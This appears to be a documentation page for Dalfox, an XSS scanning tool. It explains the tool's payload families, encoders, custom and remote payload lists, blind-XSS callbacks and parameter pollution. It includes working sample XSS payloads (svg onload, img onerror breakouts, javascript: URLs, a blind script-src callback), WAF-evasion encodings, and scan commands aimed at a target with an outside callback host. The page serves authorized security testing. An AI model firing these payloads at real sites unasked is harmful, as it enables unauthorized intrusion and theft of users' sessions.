Payloads & Encoding

Dalfox ships with a curated, context-aware payload library. Most of the time you don't need to think about it. The engine picks the right payloads for each injection context. This page covers what's built in and how to extend it.

Payload families

Dalfox composes payloads from several families:

Family Example Used when
HTML tag <svg onload=alert(1)> HTML context
Attribute breakout '><img src=x onerror=alert(1)> Inside an attribute
JavaScript ";alert(1);// Inside a <script> block
Event handler onmouseover=alert(1) Existing attribute value
DOM clobbering <img id=x> Legacy DOM lookups
URL protocol javascript:alert(1) href/src-like attributes
CSP bypass Nonce exfil, fallback origins When CSP is relaxed
mXSS <foreignobject>/DOMPurify bypasses Sanitizer-mutated DOM
Blind <script src=//callback/></script> --blind is set

Each payload template carries a marker (class={CLASS} or id={ID}) so the verification stage can positively identify its own element in the DOM.

Context-aware selection

During discovery Dalfox classifies each parameter by injection context, the place where its reflected value lands:

  • HTML body → HTML/attribute-breakout payloads
  • Inside a quoted attribute → attribute-breakout payloads
  • Inside <script> → JS-breakout payloads
  • Inside <style> → CSS payloads
  • Unknown → fallback mix of HTML + attribute

This keeps request counts sane while maximising hit rate.

Encoders

Encoders transform the same payload into multiple forms so the WAF and server-side filters don't all see the same bytes.

dalfox https://target.app -e url,html,base64

Available encoders:

Encoder Transforms < to
none < (raw)
url %3C
2url %253C (double)
3url %25253C (triple)
4url quadruple URL
html &#x003c;
htmlpad zero-padded HTML entity
base64 base64 of payload
unicode fullwidth mapping
zwsp zero-width space insertion

Defaults: url,html. If you add none to the list, Dalfox sends only the raw payloads.

Custom payloads

Provide your own list, one payload per line:

dalfox https://target.app --custom-payload mypayloads.txt

Swap out the built-in library entirely:

dalfox https://target.app --custom-payload mypayloads.txt --only-custom-payload

Remote payload sources

Pull community wordlists on demand:

dalfox https://target.app --remote-payloads portswigger,payloadbox

Supported sources: portswigger, payloadbox. Fetched once per run, respecting --proxy and --timeout.

Inspecting payloads

Print a payload family without running a scan:

dalfox payload event-handlers  # onerror, onmouseover, ...
dalfox payload useful-tags     # svg, img, script, ...
dalfox payload uri-scheme      # javascript:, data:, vbscript:
dalfox payload portswigger     # fetch + print remote list

Customising the "alert"

The classic alert(1) can be loud. Swap it out so you can prove impact without popping dialogs everywhere:

dalfox https://target.app \
  --custom-alert-value "document.domain" \
  --custom-alert-type str
  • --custom-alert-value: value passed to alert/prompt/confirm (default 1).
  • --custom-alert-type: none keeps the original function, str wraps the value in quotes.

Blind XSS

Blind XSS fires later, in a context you can't see (an admin panel, a support agent's dashboard). You need an out-of-band listener:

dalfox https://target.app -b https://your-callback.interact.sh

Custom blind templates:

dalfox https://target.app \
  -b https://your-callback.example \
  --custom-blind-xss-payload blind-templates.txt
# each line may contain {} (replaced with the callback URL)

HTTP Parameter Pollution (HPP)

Some filters only inspect the first occurrence of a parameter. Dalfox can duplicate parameters to slip a payload into the second slot:

dalfox https://target.app --hpp

Deep scan

By default Dalfox stops testing a parameter once it finds a verified payload. --deep-scan keeps going:

dalfox https://target.app --deep-scan

Useful for research; slower for production pipelines.

Skipping payload stages

Flag Effect
--skip-xss-scanning Discover and probe only; no payload injection
--skip-ast-analysis Skip AST-based DOM-XSS detection

Next

ESC